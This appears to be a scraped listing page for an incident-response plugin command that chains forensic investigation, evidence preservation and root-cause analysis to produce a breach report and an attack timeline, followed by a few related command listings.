Stats
Actions
Tags
From incident-response
Conduct forensic investigation of suspected breaches including evidence collection and timeline reconstruction.
How this command is triggered — by the user, by Claude, or both
Slash command
/incident-response:investigate-breach affected system or incident detailsThe summary Claude sees in its command listing — used to decide when to auto-load this command
# Investigate Breach Command Chain these steps: 1. Use `forensic-analysis-guide` to develop forensic investigation plan 2. Use `evidence-preservation` to collect and preserve digital evidence 3. Use `root-cause-analysis-security` to determine how breach occurred 4. Reconstruct attack timeline from logs and evidence Deliverables: - Forensic investigation report - Evidence inventory with chain of custody - Attack timeline showing attacker actions - Root cause analysis identifying vulnerability exploited - Breach scope: what data/systems were compromised After completion, suggest follow-u...
Chain these steps:
forensic-analysis-guide to develop forensic investigation planevidence-preservation to collect and preserve digital evidenceroot-cause-analysis-security to determine how breach occurredDeliverables:
After completion, suggest follow-up commands: respond-to-incident, write-postmortem.
npx claudepluginhub sethdford/claude-skills --plugin security-incident-response/irRuns incident response workflow for incident type (compromise, ransomware, etc.): triages via dfir agent, captures snapshots, extracts IOCs, builds timeline, generates deliverables.
/investigate-incidentInvestigates a Huntress incident by ID: retrieves details, affected hosts, timeline, remediations, and recommends approval or rejection with next steps.
/incident-responseStart incident response with severity classification, role assignment, and action plan.